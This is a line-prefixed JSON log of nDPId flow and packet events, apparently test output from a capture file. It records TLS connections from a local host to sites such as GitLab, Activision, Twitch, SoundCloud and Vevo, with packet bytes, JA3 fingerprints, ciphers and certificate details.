+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482646628,"flow_last_seen":1646482646628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482646628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1646482646628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8eQxAAEAGb\/bAqAGAAhGNgKZUAbv+Ru5OAAAAAKAC+vDfwAAAAgQFtAQCCAp7uQs2AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1646482646646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646646,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8QICEY2AwKgBgAG7plR0ThXR\/kbuT6AS\/oh2XAAAAgQFtAQCCAqpkTIKe7kLNgEDAwc="} +01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1646482646648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482646648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5eQ5AAEAGbffAqAGAAhGNgKZUAbv+Ru5PdE4V0oAYAfbaKAAAAQEICnu5C0qpkTIKFgMBAgABAAH8AwMSh5Kk8yD8gdWVB2YFzzg9KRBCWJ\/pzlApBrokxgf2OCBs84UpHDw4uY4jKpCVZJzZAhJUrEs0AlJ7gTtfJSwiWgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cuYWN0aXZpc2lvbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg40qefHDImQJEkibGm9hnpGwl44lKo4KOQS8qsLRSATsAFwBBBPNBVrG5A+ZLqrow1aQOaEgsW+53RcPAplpAt8ULtljoAJH8CjL7YTSZ+PIOiRhMhirRlex47cXc5PiOAFYE9T0AKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issu
erDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482659915,"flow_last_seen":1646482659915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482659915,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1646482659915,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659915,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NwhAAEAGcJnAqAGAkks+p7QEAbuPD+ThAAAAAKAC+vAn\/AAAAgQFtAQCCAp9leqxAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1646482659944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659944,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrqGSSz6nwKgBgAG7tAQzgGmMjw\/k4qAS\/\/\/dhgAAAgQFTAQCCAr4JbCIfZXqsQEDAwk="} 
+01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1646482659945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482659945,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5NwpAAEAGbprAqAGAkks+p7QEAbuPD+TiM4BpjYAYAfarGwAAAQEICn2V6s\/4JbCIFgMBAgABAAH8AwPVHsjDDxZ0MEuPnh4mVZQrYKtXYBQ9pfekL0WuWf4AwyAvTRXY5\/1xoex7GTddskZx0XzTM0eEKSDE8zjmPz09AAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1ncWwudHdpdGNoLnR2ABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AICTuPjjZ\/cozh9y3b4u57OZ+NqRixmrA1oX4LnqMFUIxABcAQQTtWijAm0UTGHfpz\/ha9z62jseAV4wQoU798kRZvjxGrgocjEiYQtFtFEOacmIDo8c6dP4orndC+2JQqffkv\/gjACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482686914,"flow_last_seen":1646482686914,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482686914,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1646482686914,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482686914,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8RWlAAEAGOjfAqAGA0FUonrNwAFCsdkxQAAAAAKAC+vAqmQAAAgQFtAQCCArNau1nAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1646482687080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482687080,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8\/\/dAAPAGz6fQVSiewKgBgABQs3Db1RKprHZMUaASOQif4AAAAgQFtAEDAwAEAggKWgQEFM1q7Wc="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482724450,"flow_last_seen":1646482724450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482724450,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1646482724450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724450,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sa9AAEAG8DvAqAGAEkLEZspeAbv+oP0DAAAAAKAC+vBIlQAAAgQFtAQCCAqQpxNDAAAAAAEDAwc="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1646482724458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724458,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8e2QAAPYGsIYSQsRmwKgBgAG7yl4LcBoC\/qD9BKAS\/\/+NCwAAAgQFoAQCCAqOOgLQkKcTQwEDAwg="} +01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1646482724464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482724464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5sbFAAEAG7jzAqAGAEkLEZspeAbv+oP0EC3AaA4AYAfbA9QAAAQEICpCnE1COOgLQFgMBAgABAAH8AwM6K+sImNx3dIej3yQBfsHlSQyH5l4F8hLKFYurrt+jPCCUv6qySiadEZg7Gj4\/vX5jrLg\/JYOIeoxWa\/ahTy7RDQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5zb3VuZGNsb3VkLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDq1odYnjLE9YoHd\/igeLWhv14ukLQSyf98ZPyHkQn7OgAXAEEEKYWpJR9uHJSJZBwzi1pAC8cLX9iNXc5VMFPlSgV8HHXqYbwegIwyfo36+y7oUVZIFeBilQuBs9gLF4NzHajtKwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482734324,"flow_last_seen":1646482734324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482734324,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1646482734324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734324,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8YZNAAEAGvz7AqAGAl2XAXNyUAbtdgP2MAAAAAKAC+vB5pwAAAgQFtAQCCArbJaT6AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1646482734331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734331,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJ9KXZcBcwKgBgAG73JRRJl9LXYD9jaAS\/\/87kQAAAgQFTAQCCArq9J312yWk+gEDAwk="} 
+01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1646482734334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482734334,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5YZVAAEAGvT\/AqAGAl2XAXNyUAbtdgP2NUSZfTIAYAfZOkQAAAQEICtslpQXq9J31FgMBAgABAAH8AwNzr2vzd\/QT\/aDhJiSq61v58duBBGwTUq6z8fAzWLEV5CDNfOfaUUVYVfXW\/CDKtRAJ+tVWWsbZK9mMfW2g+Km+ogAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAh2ZXZvLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCPQyH3d70yPXK9aVtEdAPnRA9ZC5WTB071dNPYc9Y+CAAXAEEEeVVr0wfghCvKk8pB3rwr9lMyYYYxB1YwkLSYt9F3bwDqNkUCdiLkyXAxOw3adrfDZNG4HFWPlbGmWIPel1Si6AArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 